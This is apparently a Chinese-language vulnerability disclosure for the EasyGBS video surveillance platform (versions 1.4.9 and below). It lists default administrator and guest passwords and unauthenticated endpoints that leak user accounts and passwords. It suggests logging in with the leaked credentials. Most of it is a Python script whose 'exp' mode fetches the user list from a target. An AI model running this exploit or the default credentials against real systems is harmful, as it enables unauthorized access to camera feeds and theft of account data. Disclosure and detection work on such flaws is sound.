一、漏洞详情
EasyGBS是由TSINGSEE开发的一款国标视频云平台。EasyGBS 1.4.9及以下版本存在未授权访问漏洞:攻击者无需登录即可直接访问平台的API接口文档,从而获取系统的API接口信息,造成信息泄露。
二、影响版本
EasyGBS <= 1.4.9
三、漏洞利用
1、默认口令:
easygbs/easygbs # 管理员权限
guest2020/guest2014&2020 # 游客权限
2、API接口文档:/apidoc/#api-device
3、用户账户密码信息泄露:/api/v1/userlist?pageindex=0&pagesize=10
4、利用泄露的用户信息,登录视频监控系统:
5、使用POC脚本检测漏洞
import requests
from bs4 import BeautifulSoup
import sys
def check_poc(result):
    """Report whether the response body carries the page fingerprint.

    The only fingerprint used is the presence of at least one
    ``<div class="spinner">`` element in ``result.text``. Any page that
    contains such a div matches, so a True result is a hint that should be
    confirmed manually rather than proof of exposure.
    """
    soup = BeautifulSoup(result.text, 'lxml')
    spinner_divs = soup.find_all('div', class_='spinner')
    return bool(spinner_divs)
def check_exp(result):
    """Return True when the literal text "UserList" occurs in the response body."""
    body = result.text
    return "UserList" in body
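class Scan():
    """Check an EasyGBS instance for the unauthenticated API exposure.

    ``poc`` only tests whether the API documentation page is served without
    a login; ``exp`` requests the user-list endpoint and returns what it
    yields. Both return a value that ``dict()`` accepts.
    """

    # Seconds to wait on connect/read. requests applies no timeout by
    # default, so an unresponsive host would otherwise block the check
    # forever.
    timeout = 10

    _HEADERS = {
        'User-Agent': "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
    }

    def poc(self, url):
        """Test whether ``url`` serves the API documentation unauthenticated.

        Returns a dict whose key 0 holds the verdict message; on a positive
        result key 1 holds the documentation URL. A transport-level failure
        is reported as "possibly not vulnerable" because nothing was
        actually verified.
        """
        # The "#api-device" fragment is client-side only and is not sent to
        # the server, so the request that reaches the host is for /apidoc/.
        target = url + r'/apidoc/#api-device'
        try:
            result = requests.get(target, headers=self._HEADERS, timeout=self.timeout)
        except requests.RequestException:
            # Only network/URL errors are treated as "undetermined". Errors
            # in the local tooling (e.g. a missing HTML parser) propagate
            # instead of being misreported as a negative finding.
            return {0: "[-] 可能不存在EasyGBS未授权访问漏洞!"}
        if result.status_code == 200 and check_poc(result):
            return {
                0: "[+] 存在EasyGBS未授权访问漏洞!",
                1: "API文档地址:{}".format(target),
            }
        return {0: "[-] 不存在EasyGBS未授权访问漏洞!"}

    def exp(self, url):
        """Request the user-list endpoint of ``url`` without credentials.

        Returns a list of ``[index, record]`` pairs taken from the
        ``UserList`` field of the JSON response, or a dict with a failure
        message under key 0. The accompanying write-up describes this
        endpoint as disclosing account and password data, so the returned
        records should be handled as sensitive material.
        """
        target = url + r'/api/v1/userlist?pageindex=0&pagesize=10'
        try:
            result = requests.get(target, headers=self._HEADERS, timeout=self.timeout)
            if result.status_code == 200 and check_exp(result):
                users = result.json()['UserList']
                if not isinstance(users, list):
                    # Unexpected shape: report as undetermined rather than
                    # returning something dict() cannot consume.
                    return {0: "[-] 可能获取用户信息失败!"}
                return [[index, user] for index, user in enumerate(users)]
        except (requests.RequestException, ValueError, KeyError, TypeError):
            # Network failure, non-JSON body, or a body that mentions
            # "UserList" without having it as a top-level key.
            return {0: "[-] 可能获取用户信息失败!"}
        return {0: "[-] 获取用户信息失败!"}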
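if __name__ == "__main__":
    # Both arguments are required and the mode must be named explicitly:
    # previously any value other than 'poc' (including a typo) fell through
    # to the user-list request, and a missing argument raised IndexError.
    if len(sys.argv) < 3 or sys.argv[2] not in ('poc', 'exp'):
        sys.exit("Usage: {} <base_url> <poc|exp>".format(sys.argv[0]))
    url, mode = sys.argv[1], sys.argv[2]
    scan = Scan()
    result = scan.poc(url) if mode == 'poc' else scan.exp(url)
    # Both methods return something dict() accepts: a dict, or a list of
    # [index, record] pairs.
    print(dict(result))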